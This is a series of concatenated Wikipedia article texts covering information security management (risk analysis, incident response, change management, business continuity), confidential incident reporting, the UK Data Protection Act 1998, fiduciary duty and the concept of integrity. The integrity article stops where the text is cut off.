Duty of Care Risk Analysis Standard (DoCRA)[198]provides principles and practices for evaluating risk.[199]It considers all parties that could be affected by those risks.[200]DoCRA helps evaluate safeguards if they are appropriate in protecting others from harm while presenting a reasonable burden.[201]With increased data breach litigation, companies must balance security controls, compliance, and its mission.[202] Computer security incident management is a specialized form of incident management focused on monitoring, detecting, and responding to security events on computers and networks in a predictable way.[203] Organizations implement this through incident response plans (IRPs) that are activated when security breaches are detected.[204]These plans typically involve an incident response team (IRT) with specialized skills in areas like penetration testing, computer forensics, and network security.[205] Change management is a formal process for directing and controlling alterations to the information processing environment.[206][207]This includes alterations to desktop computers, the network, servers, and software.[208]The objectives of change management are to reduce the risks posed by changes to the information processing environment and improve the stability and reliability of the processing environment as changes are made.[209]It is not the objective of change management to prevent or hinder necessary changes from being implemented.[210][211] Any change to the information processing environment introduces an element of risk.[212]Even apparently simple changes can have unexpected effects.[213]One of management's many responsibilities is the management of risk.[214][215]Change management is a tool for managing the risks introduced by changes to the information processing environment.[216]Part of the change management process ensures that changes are not implemented at inopportune times when they may disrupt critical business processes or interfere with other changes being implemented.[217] Not every change needs to be managed.[218][219]Some kinds of changes are a part of the everyday routine of information processing and adhere to a predefined procedure, which reduces the overall level of risk to the processing environment.[220]Creating a new user account or deploying a new desktop computer are examples of changes that do not generally require change management.[221]However, relocating user file shares, or upgrading the Email server pose a much higher level of risk to the processing environment and are not a normal everyday activity.[222]The critical first steps in change management are (a) defining change (and communicating that definition) and (b) defining the scope of the change system.[223] Change management is usually overseen by a change review board composed of representatives from key business areas,[224]security, networking, systems administrators, database administration, application developers, desktop support, and the help desk.[225]The tasks of the change review board can be facilitated with the use of automated work flow application.[226]The responsibility of the change review board is to ensure the organization's documented change management procedures are followed.[227]The change management process is as follows[228] Change management procedures that are simple to follow and easy to use can greatly reduce the overall risks created when changes are made to the information processing environment.[260]Good change management procedures improve the overall quality and success of changes as they are implemented.[261]This is accomplished through planning, peer review, documentation, and communication.[262] ISO/IEC 20000, The Visible OPS Handbook: Implementing ITIL in 4 Practical and Auditable Steps[263](Full book summary),[264]andITILall provide valuable guidance on implementing an efficient and effective change management program information security.[265] Business continuity management (BCM) concerns arrangements aiming to protect an organization's critical business functions from interruption due to incidents, or at least minimize the effects.[266][267]BCM is essential to any organization to keep technology and business in line with current threats to the continuation of business as usual.[268]The BCM should be included in an organizationsrisk analysisplan to ensure that all of the necessary business functions have what they need to keep going in the event of any type of threat to any business function.[269] It encompasses: Whereas BCM takes a broad approach to minimizing disaster-related risks by reducing both the probability and the severity of incidents, adisaster recovery plan(DRP) focuses specifically on resuming business operations as quickly as possible after a disaster.[279]A disaster recovery plan, invoked soon after a disaster occurs, lays out the steps necessary to recover criticalinformation and communications technology(ICT) infrastructure.[280]Disaster recovery planning includes establishing a planning group, performing risk assessment, establishing priorities, developing recovery strategies, preparing inventories and documentation of the plan, developing verification criteria and procedure, and lastly implementing the plan.[281] Below is a partial listing of governmental laws and regulations in various parts of the world that have, had, or will have, a significant effect on data processing and information security.[282][283]Important industry sector regulations have also been included when they have a significant impact on information security.[282] The US Department of Defense (DoD) issued DoD Directive 8570 in 2004, supplemented by DoD Directive 8140, requiring all DoD employees and all DoD contract personnel involved in information assurance roles and activities to earn and maintain various industry Information Technology (IT) certifications in an effort to ensure that all DoD personnel involved in network infrastructure defense have minimum levels of IT industry recognized knowledge, skills and abilities (KSA). Andersson and Reimers (2019) report these certifications range from CompTIA's A+ and Security+ through the ICS2.org's CISSP, etc.[318] Describing more than simply how security aware employees are, information security culture is the ideas, customs, and social behaviors of an organization that impact information security in both positive and negative ways.[319]Cultural concepts can help different segments of the organization work effectively or work against effectiveness towards information security within an organization. The way employees think and feel about security and the actions they take can have a big impact on information security in organizations. Roer & Petric (2017) identify seven core dimensions of information security culture in organizations:[320] Andersson and Reimers (2014) found that employees often do not see themselves as part of the organization Information Security "effort" and often take actions that ignore organizational information security best interests.[322]Research shows information security culture needs to be improved continuously. InInformation Security Culture from Analysis to Change, authors commented, "It's a never ending process, a cycle of evaluation and change or maintenance." To manage the information security culture, five steps should be taken: pre-evaluation, strategic planning, operative planning, implementation, and post-evaluation.[323]
https://en.wikipedia.org/wiki/Confidentiality,_integrity,_and_availability
Aconfidential incident reportingsystem is a mechanism which allows problems in safety-critical fields such asaviationandmedicineto be reportedin confidence. This allows events to be reported which otherwise might not be reported through fear ofblameor reprisals against the reporter. Analysis of the reported incidents can provide insight into how those events occurred, which can spur the development of measures to make the system safer.[1][2] TheAviation Safety Reporting System, created by the US aviation industry in 1976, was one of the earliest confidential reporting systems. TheInternational Confidential Aviation Safety Systems Groupis an umbrella organization for confidential reporting systems in the airline industry.[3] Other examples include: It has been suggested that medical organizations also adopt the confidential reporting model.[6]Examples of confidential reporting in medicine includeCORESS, a confidential reporting system for surgery in the United Kingdom.[7] This organization-related article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Confidential_reporting_system
TheData Protection Act 1998(c. 29) (DPA) was anact of Parliamentof theUnited Kingdomdesigned to protectpersonal datastored oncomputersor in an organised paper filing system. It enacted provisions from the European Union (EU)Data Protection Directive 1995on the protection, processing, and movement of data. Under the 1998 DPA, individuals had legal rights to control information about themselves. Most of the Act did not apply to domestic use,[1]such as keeping a personal address book. Anyone holding personal data for other purposes was legally obliged to comply with this Act, subject to some exemptions. The Act defined eight data protection principles to ensure that information was processed lawfully. It was superseded by theData Protection Act 2018(DPA 2018) on 23 May 2018. The DPA 2018 supplements the EUGeneral Data Protection Regulation(GDPR), which came into effect on 25 May 2018. The GDPR regulates the collection, storage, and use of personal data significantly more strictly.[2] The 1998 act replaced theData Protection Act 1984(c. 35) and theAccess to Personal Files Act 1987(c. 37). Additionally, the 1998 act implemented the EUData Protection Directive 1995. ThePrivacy and Electronic Communications (EC Directive) Regulations 2003altered the consent requirement for most electronic marketing to "positive consent" such as an opt-in box. Exemptions remain for the marketing of "similar products and services" to existing customers and enquirers, which can still be permitted on an opt-out basis. The Jersey data protection law, theData Protection (Jersey) Law 2005was modelled on the United Kingdom's law.[3] Section 1 of DPA 1998 defined "personal data" as any data that could have been used to identify a living individual. Anonymised or aggregated data was less regulated by the Act, provided the anonymisation or aggregation had not been done reversibly. Individuals could have been identified by various means including name and address, telephone number, or email address. The Act applied only to data which was held, or was intended to be held, on computers ("equipment operating automatically in response to instructions given for that purpose"), or held in a "relevant filing system".[4] In some cases, paper records could have been classified as a relevant filing system, such as an address book or a salesperson's diary used to support commercial activities.[5] TheFreedom of Information Act 2000modified the act for public bodies and authorities, and theDurantcase modified the interpretation of the act by providing case law and precedent.[6] A person who had their data processed had the following rights:[7][8] Schedule 1 listed eight "data protection principles": Broadly speaking, these eight principles were similar to the six principles set out in the GDPR of 2016.[14] Personal data should only be processed fairly and lawfully. In order for data to be classed as 'fairly processed', at least one of these six conditions had to be applicable to that data (Schedule 2). Except under the exceptions mentioned below, the individual had to consent to the collection of their personal information[16]and its use in the purpose(s) in question. TheEuropean Data Protection Directivedefined consent as “…any freely given specific and informed indication of his wishes by which the data subject signifies his agreement to personal data relating to him being processed", meaning the individual could havesignifiedagreement other than in writing.[citation needed]However, non-communication should not have been interpreted as consent. Additionally, consent should have been appropriate to the age and capacity of the individual and other circumstances of the case. If an organisation "intends to continue to hold or use personal data after the relationship with the individual ends, then the consent should cover this." When consent was given, it was not assumed to last forever, though in most cases, consent lasted for as long as the personal data needed to be processed, and individuals may have been able to withdraw their consent, depending on the nature of the consent and the circumstances in which the personal information was collected and used.[17] The Data Protection Act also specified that sensitive personal data must have been processed according to a stricter set of conditions, in particular, any consent must have been explicit.[17] The Act was structured such that all processing of personal data was covered by the act while providing a number of exceptions in Part IV.[1]Notable exceptions were: The Act granted or acknowledged various police and court powers. The Act detailed a number of civil and criminal offences for which data controllers may have been liable if a data controller failed to gain appropriate consent from a data subject. However, consent was not specifically defined in the Act and so was a common law matter. The UK Data Protection Act was a large Act that had a reputation for complexity.[25]While the basic principles were honored for protecting privacy, interpreting the act was not always simple. Many companies, organisations, and individuals seemed very unsure of the aims, content, and principles of the Act. Some refused to provide even very basic, publicly available material, quoting the Act as a restriction.[26]The Act also impacted the way in which organisations conducted business in terms of who should have been contacted for marketing purposes, not only by telephone and direct mail, but also electronically. This has led to the development of permission-based marketing strategies.[27] The definition of personal data was data relating to a living individual who can be identified Sensitive personal data concerned the subject's race, ethnicity, politics, religion, trade union status, health, sexual history, or criminal record.[28] The Information Commissioner's Office website stated regardingsubject access requests:[29]"You have the right to find out if an organisation is using or storing your personal data. This is called the right of access. You exercise this right by asking for a copy of the data, which is commonly known as making a 'subject access request.'" Before the General Data Protection Regulation (GDPR) came into force on 25 May 2018, organisations could have charged a specified fee for responding to a SAR of up to £10 for most requests. Following GDPR: "A copy of your personal data should be provided free. An organisation may charge for additional copies. It can only charge a fee if it thinks the request is 'manifestly unfounded or excessive'. If so, it may ask for a reasonable fee for administrative costs associated with the request."[29] Compliance with the Act was regulated and enforced by an independent authority, the Information Commissioner's Office, which maintained guidance relating to the Act.[30][31] In January 2017, the Information Commissioner's Office invited public comments on the EU's Article 29 Working Party's proposed changes to data protection law and the anticipated introduction of extensions to the interpretation of the Act, theGuide to the General Data Protection Regulation.[32]
https://en.wikipedia.org/wiki/Data_Protection_Act_1998
Afiduciaryis a person who holds alegalor ethical relationship oftrustwith one or more otherparties(legal personor group of persons). Typically, a fiduciary prudently takes care of money or otherassetsfor another person. One party, for example, a corporate trust company or the trust department of a bank, acts in a fiduciary capacity to another party, who, for example, has entrusted funds to the fiduciary for safekeeping or investment. Likewise,financial advisers,financial planners, and asset managers, including managers of pension plans, endowments, and other tax-exempt assets, are considered fiduciaries under applicable statutes and laws.[1]In a fiduciary relationship, one person, in a position of vulnerability, justifiably vests confidence,good faith, reliance, and trust in another whose aid, advice, or protection is sought in some matter.[2]: 68[3]In such a relation, good conscience requires the fiduciary to act at all times for the sole benefit and interest of the one who trusts. A fiduciary is someone who has undertaken to act for and on behalf of another in a particular matter in circumstances which give rise to a relationship of trust and confidence. Fiduciary dutiesin a financial sense exist to ensure that those who manage other people's money act in their beneficiaries' interests, rather than serving their own interests. Afiduciary duty[5]is the higheststandard of carein equity or law. A fiduciary is expected to be extremely loyal to the person to whom he owes the duty (the "principal") such that there must be no conflict of duty between fiduciary and principal, and the fiduciary must not profit from their position as a fiduciary,[6]unless the principal consents.[7]The nature of fiduciary obligations differs among jurisdictions. In Australia, only proscriptive or negative fiduciary obligations are recognised,[3]: 113[8]: 198[9]whereas in Canada, fiduciaries can come under both proscriptive (negative) and prescriptive (positive) fiduciary obligations.[10][11] InEnglishcommon law, the fiduciary relation is an important concept within a part of the legal system known asequity. In the United Kingdom, theJudicature Actsmerged thecourts of equity(historically based in England'sCourt of Chancery) with the courts of common law, and as a result the concept of fiduciary duty also became applicable incommon lawcourts. When a fiduciary duty is imposed, equity requires a different, stricter standard of behavior than the comparabletortiousduty of carein common law. The fiduciary has a duty not to be in a situation where personal interests and fiduciary duty conflict, not to be in a situation where their fiduciary duty conflicts with another fiduciary duty, and a duty not to profit from their fiduciary position without knowledge and consent. A fiduciary ideally would not have aconflict of interest. It has been said that fiduciaries must conduct themselves "at a level higher than that trodden by the crowd"[12]and that "[t]he distinguishing or overriding duty of a fiduciary is the obligation of undivided loyalty".[13]: 289 Different jurisdictions regard fiduciary duties in different lights.Canadian law, for example, has developed a more expansive view of fiduciary obligation thanAmerican law,[14]whileAustralian lawandBritish lawhave developed more conservative approaches than either the United States orCanada.[3]In Australia, it has been found that there is no comprehensive list of criteria by which to establish a fiduciary relationship.[13]Courts have so far refused to define the concept of a fiduciary, instead preferring to develop the law on a case-by-case basis and by way of analogy.[2][8]Fiduciary relationships are of different types and carry different obligations so that a test appropriate to determine whether a fiduciary relationship exists for one purpose might be inappropriate for another:[2] In 2014 theLaw Commission (England and Wales)reviewed the fiduciary duties of investment intermediaries, looking particularly at the duties on pension trustees. They commented that the term "fiduciary" is used in many different ways. Fiduciary duties cannot be understood in isolation. Instead they are better viewed as ‘legalpolyfilla’, molding themselves flexibly around other legal structures, and sometimes filling the gaps. The question of who is a fiduciary is a "notoriously intractable" question and this was the first of many questions. InSEC v. Chenery Corporation,[16]Frankfurter Jsaid, To say that a man is a fiduciary only begins the analysis; it gives direction to further inquiry. To whom is he a fiduciary? What obligations does he owe as a fiduciary? In what respect has he failed to discharge these obligations? And what are the consequences of his deviation from his duty? The law expressed here follows the general body of elementary fiduciary law found in most common law jurisdictions; for in-depth analysis of particular jurisdictional idiosyncrasies please consult primary authorities within the relevant jurisdiction. This is especially true in the area of Labor and Employment law. InCanadaa fiduciary has obligations to the employer even after the employment relationship is terminated, whereas in the United States the employment and fiduciary relationships terminate together. The corporate law ofDelawareis the most influential in the United States, as more than 50% of publicly traded companies in the United States, including 64% of the Fortune 500, have chosen to incorporate in that state.[17]Under Delaware law, officers, directors and other control persons of corporations and other entities owe three primary fiduciary duties, (1) theduty of care, (2) theduty of loyaltyand (3) theduty of good faith.[18] The duty of care requires control persons to act on an informed basis after due consideration of all information. The duty includes a requirement that such persons reasonably inform themselves of alternatives. In doing so, they may rely on employees and other advisers so long as they do so with a critical eye and do not unquestionably accept the information and conclusions provided to them. Under normal circumstances, their actions are accorded the protection of the business judgment rule, which presumes that control persons acted properly, provided that they act on an informed basis, in good faith and in the honest belief that the action taken was in the best interests of the company.[18] The duty of loyalty requires control persons to look to the interests of the company and its other owners and not to their personal interests. In general, they cannot use their positions of trust, confidence and inside knowledge to further their own private interests or approve an action that will provide them with a personal benefit (such as continued employment) that does not primarily benefit the company or its other owners.[18] The duty of good faith requires control persons to exercise care and prudence in making business decisions—that is, the care that a reasonably prudent person in a similar position would use under similar circumstances. Control persons fail to act in good faith, even if their actions are not illegal, when they take actions for improper purposes or, in certain circumstances, when their actions have grossly inequitable results. The duty to act in good faith is an obligation not only to make decisions free from self-interest, but also free of any interest that diverts the control persons from acting in the best interest of the company. The duty to act in good faith may be measured by an individual's particular knowledge and expertise. The higher the level of expertise, the more accountable that person will be (e.g., a finance expert may be held to a more exacting standard than others in accepting a third party valuation).[18] At one time, courts seemed to view the duty of good faith as an independent obligation. However, more recently, courts have treated the duty of good faith as a component of the duty of loyalty.[18][19] In Canada, directors of corporations owe a fiduciary duty. A debate exists as to the nature and extent of this duty following a controversial landmark judgment from theSupreme Court of CanadainBCE Inc. v. 1976 Debentureholders. Scholarly literature has defined this as a "tripartite fiduciary duty", composed of (1) an overarching duty to the corporation, which contains two component duties—(2) a duty to protect shareholder interests from harm, and (3) a procedural duty of "fair treatment" for relevant stakeholder interests. This tripartite structure encapsulates the duty of directors to act in the "best interests of the corporation, viewed as a good corporate citizen".[14] The most common circumstance where a fiduciary duty will arise is between atrustee, whether real or juristic, and abeneficiary. The trustee to whom property is legally committed is the legal—i.e., common law—owner of all such property. The beneficiary, at law, has no legal title to thetrust; however, the trustee is bound by equity to suppress their own interests and administer the property only for the benefit of the beneficiary. In this way, the beneficiary obtains theuseof property without being its technical owner. Others, such as corporatedirectors, may be held to a fiduciary duty similar in some respects to that of a trustee. This happens when, for example, the directors of a bank are trustees for the depositors, the directors of a corporation are trustees for the stockholders or a guardian is trustee of their ward's property. A person in a sensitive position sometimes protects themselves from possible conflict of interest charges by setting up ablind trust, placing their financial affairs in the hands of a fiduciary and giving up all right to know about or intervene in their handling. The fiduciary functions of trusts and agencies are commonly performed by atrust company, such as acommercial bank, organized for that purpose. In the United States, theOffice of the Comptroller of the Currency(OCC), an agency of theUnited States Department of the Treasury, is the primaryregulatorof the fiduciary activities offederal savings associations. When a court desires to hold the offending party to a transaction responsible so as to prevent unjust enrichment, the judge can declare that a fiduciary relation exists between the parties, as though the offender were in fact a trustee for the partner. Relationships which routinely attract by law a fiduciary duty between certain classes of persons include these: In Australia, the categories of fiduciary relationships are not closed.[2][8] Roman and civil law recognized a type of contract calledfiducia(alsocontractus fiduciaeor fiduciary contract), involving essentially a sale to a person coupled with an agreement that the purchaser should sell the property back upon the fulfillment of certain conditions.[52]Such contracts were used in the emancipation of children, in connection with testamentary gifts and in pledges. Under Roman law a woman could arrange a fictitious sale called afiduciary coemptionin order to change her guardian or gain legal capacity to make a will.[53] InRoman Dutch law, afiduciary heirmay receive property subject to passing it to another on fulfilment of certain conditions; the gift is called afideicommissum. The fiduciary of afideicommissumis afideicommissionerand one that receives property from a fiduciary heir is afideicommissary heir.[54] Fiduciary principles may be applied in a variety of legal contexts.[55] Joint ventures, as opposed to businesspartnerships,[38]are notpresumedto carry a fiduciary duty; however, this is a matter of degree.[56][57]If a joint venture is conducted at commercial arm's length and both parties are on an equal footing then thecourtswill be reluctant to find a fiduciary duty, but if the joint venture is carried out more in the manner of a partnership then fiduciary relationships can and often will arise.[58][59][56] Husbands and wives are notpresumedto be in a fiduciary relationship in many jurisdictions; however, this may be easily established. Similarly, ordinary commercial transactions in themselves are notpresumedto but can give rise to fiduciary duties, should the appropriate circumstances arise. These are usually circumstances where the contract specifies a degree of trust and loyalty or it can be inferred by the court.[2][60] Australian courts also do not recognise parents and their children to be in fiduciary relationships.[48][61][62]In contrast, the Supreme Court of Canada allowed a child to sue her father for damages for breach of his fiduciary duties, opening the door in Canada for allowing fiduciary obligations between parent and child to be recognised.[63] Australian courts have also not accepted doctor-patient relationships as fiduciary in nature. InBreen v Williams,[3]the High Court viewed the doctor's responsibilities over their patients as lacking the representative capacity of the trustee in fiduciary relationships. Moreover, the existence of remedies in contract and tort made the Court reluctant in recognising the fiduciary relationship. In 2011, in an insider trading case, the U.S. Securities and Exchange Commission brought charges against a boyfriend of a Disney intern, alleging he had a fiduciary duty to his girlfriend and breached it. The boyfriend, Toby Scammell, allegedly received and used insider information on Disney's takeover of Marvel Comics.[64][65] Generally, the employment relationship is not regarded as fiduciary, but may be so if ... within a particular contractual relationship there are specific contractual obligations which the employee has undertaken which have placed him in a situation where equity imposes these rigorous duties in addition to the contractual obligations. Although terminologies like duty of good faith, or loyalty, or the mutual duty of trust and confidence are frequently used to describe employment relationships, such concepts usually denote situations where "a party merely has to take into consideration the interests of another, but does not have to act in the interests of that other.[check quotation syntax][66] If fiduciary relationships are to arise between employers and employees, it is necessary to ascertain that the employee has placed himself in a position where he must act solely in the interests of his employer.[66]In the case ofCanadian Aero Service Ltd v O'Malley,[67]it was held that a senior employee is much more likely to be found to owe fiduciary duties towards his employer. In 2015, theUnited States Department of Laborissued a proposed rule that if finalized would extend the fiduciary duty relationship to investment advisors and some brokers including insurance brokers.[68]In 2017, thefirst Trump administrationplanned to order a 180-delay of implementation of the rule,[69]sometimes known as the 'fiduciary rule'.[70]The rule would require "brokers offering retirement investment advice to put their clients' interest first".[69]The Trump administration later rescinded the fiduciary rule on July 20, 2018.[71][72]Prior to its repeal, the rule was also dealt blows by theUS Fifth Circuit Court of Appealsin March and June 2018.[73] For example, two members,XandY, of a band currently under contract with one another (or with some other tangible, existing relationship that creates a legal duty) record songs together. Let us imagine it is a serious, successful band and that a court would declare that the two members are equal partners in a business. One day,Xtakes some demos made cooperatively by the duo to a recording label, where an executive expresses interest.Xpretends it is all his work and receives an exclusivecontractand $50,000.Yis unaware of the encounter until reading it in the paper the next week. This situation represents a conflict of interest and duty. BothXandYhold fiduciary duties to each other, which means they must subdue their own interests in favor of the duo's collective interest. By signing an individual contract and taking all the money,Xhas put personal interest above the fiduciary duty. Therefore, a court will find thatXhas breached his fiduciary duty. Thejudicial remedyhere will be thatXholds both the contract and the money in aconstructive trustfor the duo. Note,Xwill not be punished or totally denied of the benefit; bothXandYwill receive a half share in the contract and the money. WhenT. Boone Pickens'sMesa Petroleumattempted to take overCities Servicein 1982, Cities Service attempted to take over the smaller Mesa instead. Pickens was friends with Alan Habacht ofWeiss, Peck & Greer, who supported Mesa's attempt. Fiduciary duty, however, required Habacht to seek the maximum possible return on the investment he managed by offering Weiss's Mesa shares to Cities'stender offer.[74] A fiduciary, such as the administrator,executoror guardian of an estate, may be legally required to file with a probate court or judge asurety bond, called afiduciary bondorprobate bond, to guarantee faithful performance of his duties.[75]One of those duties may be to prepare, generally under oath, aninventoryof the tangible or intangible property of the estate, describing the items or classes of property and usually placing a valuation on them.[76] A bank or other fiduciary having legal title to a mortgage may sell fractional shares to investors, thereby creating aparticipating mortgage. A fiduciary will be liable to account if proven to have acquired a profit, benefit or gain from the relationship by one of three means:[1] Therefore, it is said the fiduciary has a duty not to be in a situation where personal interests and fiduciary duty conflict, a duty not to be in a situation where his fiduciary duty conflicts with another fiduciary duty, and not to profit from his fiduciary position without express knowledge and consent. A fiduciary cannot have aconflict of interest. The state of Texas in the United States sets out the duties of a fiduciary in its Estates Code, chapter 751, as follows (the bracketed references to TPC refer to the Texas Probate Code superseded by the Estates Code, effective January 1, 2014): A fiduciary's duty must not conflict with another fiduciary duty.[20][38][77]Conflicts between one fiduciary duty and another fiduciary duty arise most often when alawyeror anagent, such as areal estate agent, represent more than one client, and the interests of those clients conflict.[23]This would occur when a lawyer attempts to represent both theplaintiffand thedefendantin the same matter, for example. The rule comes from thelogicalconclusion that a fiduciary cannot make the principal's interests a top priority if he has two principals and their interests are diametrically opposed; he must balance the interests, which is not acceptable to equity. Therefore, the conflict of duty and duty rule is really an extension of the conflict of interest and duty rules. A fiduciary must not profit from the fiduciary position.[6][24][38][2]This includes any benefits orprofitswhich, although unrelated to the fiduciary position, came about because of an opportunity that the fiduciary position afforded.[38][78]It is unnecessary that the principal would have been unable to make the profit; if the fiduciary makes a profit, by virtue of his role as fiduciary for the principal, then the fiduciary must report the profit to the principal. If the principal provides fullyinformed consent, then the fiduciary may keep the benefit and be absolved of any liability for what would be a breach of fiduciary duty.[13][22][34]If this requirement is not met then the property is deemed by the court to be held by the fiduciary on constructive trust for the principal.[20] Secret commissions, orbribes, also come under the no profit rule.[79]The bribe shall be held in constructive trust for the principal. The person who made the bribe cannot recover it, since he has committed acrime. Similarly, the fiduciary, who received the bribe, has committed a crime. Fiduciary duties are an aspect of equity and, in accordance with the equitable principles, or maxims, equity serves those with clean hands. Therefore, the bribe is held on constructive trust for the principal, the only innocent party. Bribes were initially considered not to be held on constructive trust, but were considered to be held as adebtby the fiduciary to the principal.[80]This approach has been overruled; the bribe is now classified as a constructive trust.[81]The change is due to pragmatic reasons, especially in regard to abankruptfiduciary. If a fiduciary takes a bribe and that bribe is considered a debt then if the fiduciary goes bankrupt the debt will be left in his pool of assets to be paid tocreditorsand the principal may miss out on recovery because other creditors were more secured. If the bribe is treated as held on a constructive trust then it will remain in the possession of the fiduciary, despite bankruptcy, until such time as the principal recovers it. The landmark Australian decisionASIC v Citigroupnoted that the "informed consent" on behalf of the beneficiary to breaches of either the no-profit and no-conflict rule will allow the fiduciary to get around these rules.[13][58]Furthermore, it highlighted that a contract may include a clause that allows individuals to avoid all fiduciary obligations within the course of dealings, and thereby continue to make a personal profit or deal with other parties- tasks that may otherwise have been in conflict with what would have been a fiduciary duty had it not been for this clause.[13]In the Australian case ofFarah Constructions Pty Ltd v Say-Dee Pty Ltd, however, Gleeson CJ, Gummow, Callinan, Heydon and Crennan JJ observed that the sufficiency of disclosure may depend on the sophistication and intelligence of the persons to whom the disclosure must be made.[58] However, in the English case ofArmitage v Nursean exception was noted to be the fiduciary's obligation of good faith;[82]liability for breach of fiduciary duty by way of fraud or dishonesty cannot be avoided through an exclusion clause in a contract. The decision inArmitage v Nursehas been applied in Australian .[83] Conduct by a fiduciary may be deemedconstructive fraudwhen it is based on acts, omissions or concealments considered fraudulent and that gives one an advantage against the other because such conduct—though not actually fraudulent, dishonest or deceitful—demands redress for reasons of public policy.[84]Breach of fiduciary duty may occur ininsider trading, when an insider or a related party makes trades in a corporation's securities based on material non-public information obtained during the performance of the insider's duties at the corporation. Breach of fiduciary duty by a lawyer with regard to a client, if negligent, may be a form oflegal malpractice; if intentional, it may be remedied in equity.[85][86] Where a principal can establish both a fiduciary duty and a breach of that duty, through violation of the above rules, the court will find that the benefit gained by the fiduciary should be returned to the principal because it would beunconscionableto allow the fiduciary to retain the benefit by employing his strict common law legalrights. This will be the case, unless the fiduciary can show there was full disclosure of the conflict of interest or profit and that the principal fully accepted and freely consented to the fiduciary's course of action.[58] Remedies will differ according to the type of damage or benefit. They are usually distinguished between proprietary remedies, dealing with property, and personal remedies, dealing with pecuniary (monetary) compensation. Where concurrent contractual and fiduciary relationships exist, remedies available to the plaintiff beneficiary is dependent upon the duty of care owed by the defendant and the specific breach of duty allowing for remedy/damages. The courts will clearly distinguish the relationship and determine the nature in which the breach occurred.[87] Where the unconscionable gain by the fiduciary is in an easily identifiable form, such as the recording contract discussed above, the usual remedy will be the already discussed constructive trust.[88] Constructive trusts pop up in many aspects of equity, not just in a remedial sense,[89]but, in this sense, what is meant by a constructive trust is that the court has created and imposed a duty on the fiduciary to hold the money in safekeeping until it can be rightfully transferred to the principal.[38][90] Anaccount of profitsis another potential remedy.[91]It is usually used where the breach of duty was ongoing or when the gain is hard to identify. The idea of an account of profits is that the fiduciary profited unconscionably by virtue of the fiduciary position, so any profit made should be transferred to the principal. It may sound like a constructive trust at first, but it is not. An account of profits is the appropriate remedy when, for example, a senioremployeehas taken advantage of his fiduciary position by conducting his owncompanyon the side and has run up quite a lot of profits over a period of time, profits which he wouldn't have been able to make otherwise. The fiduciary in breach may however receive an allowance for effort and ingenuity expended in making the profit. Compensatory damagesare also available.[92]Accounts of profits can be hard remedies to establish, therefore, a plaintiff will often seek compensation (damages) instead. Courts of equity initially had no power to award compensatory damages, which traditionally were a remedy at common law, but legislation and case law has changed the situation so compensatory damages may now be awarded for a purely equitable action. Some experts have argued that, in the context of pension governance,trusteeshave started to reassert their fiduciary prerogatives more strongly after 2008 – notably following the heavy losses or reduced returns incurred by many retirement schemes in the wake of theGreat Recessionand the progression ofESG and Responsible Investmentideas: "Clearly, there is a mounting demand for CEOs (equity issuers) and governments (sovereign bond issuers) to be more 'accountable' ... No longer ‘absentee landlords', trustees have started to exercise more forcefully their governance prerogatives across the boardrooms of Britain, Benelux and America: coming together through the establishment of engaged pressure groups."[93]However, in the United States, there are questions whether a pension's decision to consider factors such as how investments impact contributors' continued employment violate a fiduciary duty to maximize the retirement fund's returns.[94] Pension fundsand other largeinstitutional investorsare increasingly making their voices heard to call out irresponsible practices in the businesses in which they invest[95] The Fiduciary Duty in the 21st Century Programme, led by theUnited Nations Environment Programme Finance Initiative, thePrinciples for Responsible Investment, and the Generation Foundation, aims to end the debate on whether fiduciary duty is a legitimate barrier to the integration of environmental, social and governance (ESG) issues in investment practice and decision-making.[96]This followed the 2015 publication of "Fiduciary Duty in the 21st Century" which concluded that "failing to consider all long-term investment value drivers, including ESG issues, is a failure of fiduciary duty".[97]Founded on the realization that there is a general lack of legal clarity globally about the relationship between sustainability and investors’ fiduciary duty, the programme engaged with and interviewed over 400 policymakers and investors to raise awareness of the importance of ESG issues to the fiduciary duties of investors. The programme also published roadmaps which set out recommendations to fully embed the consideration of ESG factors in the fiduciary duties of investors across more than eight capital markets.[96]Drawing upon findings from Fiduciary Duty in the 21st Century, the European Commission High-Level Expert Group (HLEG) recommended in its 2018 final report that the EU Commission clarify investor duties to better embrace long-term horizon and sustainability preferences.[98] The following books cover the field in detail:
https://en.wikipedia.org/wiki/Fiduciary
Integrityis the quality of being honest and having a consistent and uncompromising adherence to strong moral and ethicalprinciplesandvalues.[1][2]Inethics, integrity is regarded as the honesty andtruthfulnessorearnestnessof one's actions. Integrity can stand in opposition tohypocrisy.[3]It regards internal consistency as a virtue, and suggests that people who hold apparently conflicting values should account for the discrepancy or alter those values. The wordintegrityevolved from the Latin adjectiveinteger, meaningwholeorcomplete.[1]In this context, integrity is the inner sense of "wholeness" deriving from qualities such ashonestyand consistency ofcharacter.[4] Inethics, a person is said to possess thevirtueof integrity if the person's actions are based upon an internally consistent framework of principles.[5]These principles should uniformly adhere to sound logicalaxiomsor postulates. A person has ethical integrity to the extent that the person's actions, beliefs, methods, measures, and principles align with a well-integratedcore group of values. A person must, therefore, be flexible and willing to adjust these values to maintain consistency when these values are challenged—such as when observed results are incongruous with expected outcomes. Because such flexibility is a form ofaccountability, it is regarded as amoral responsibilityas well as a virtue. A person'svalue systemprovides aframeworkwithin which the person acts in ways that are consistent and expected. Integrity can be seen as the state of having such a framework and acting congruently within it. One essential aspect of a consistent framework is its avoidance of any unwarranted (arbitrary) exceptions for a particular person or group—especially the person or group that holds the framework. In law, this principle of universal application requires that even those in positions of official power can be subjected to the same laws as pertain to their fellow citizens. In personal ethics, this principle requires that one should not act according to any rule that one would not wish to see universally followed. For example, one should not steal unless one would want to live in a world in which everyone was a thief. The philosopherImmanuel Kantformally described the principle of universality of application for one's motives in hiscategorical imperative. The concept of integrity implies a wholeness—a comprehensive corpus of beliefs often referred to as aworldview. This concept of wholeness emphasizeshonestyandauthenticity, requiring that one act at all times in accordance with one's worldview. Ethical integrity is not synonymous with the good, as Zuckert and Zuckert show aboutTed Bundy: When caught, he defended his actions in terms of thefact-value distinction. He scoffed at those, like the professors from whom he learned the fact-value distinction, who still lived their lives as if there were truth-value to value claims. He thought they were fools and that he was one of the few who had the courage and integrity to live a consistent life in light of the truth that value judgments, including the command "Thou shalt not kill," are merely subjective assertions. Politicians are given power to make, execute, or control policy, which can have important consequences. They typically promise to exercise this power in a way that serves society, but may not do so, which opposes the notion of integrity. Aristotle said that because rulers have power they will be tempted to use it for personal gain.[7] In the bookThe Servant of the People, Muel Kaptein says integrity should start with politicians knowing what their position[ambiguous]entails, because the consistency required by integrity applies also to the consequences of one's position. Integrity also demands knowledge and compliance with both the letter and the spirit of the written and unwritten rules. Integrity is also acting consistently not only with what is generally accepted as moral, what others think, but primarily with what is ethical, what politicians should do based on reasonable arguments.[8] Important[to 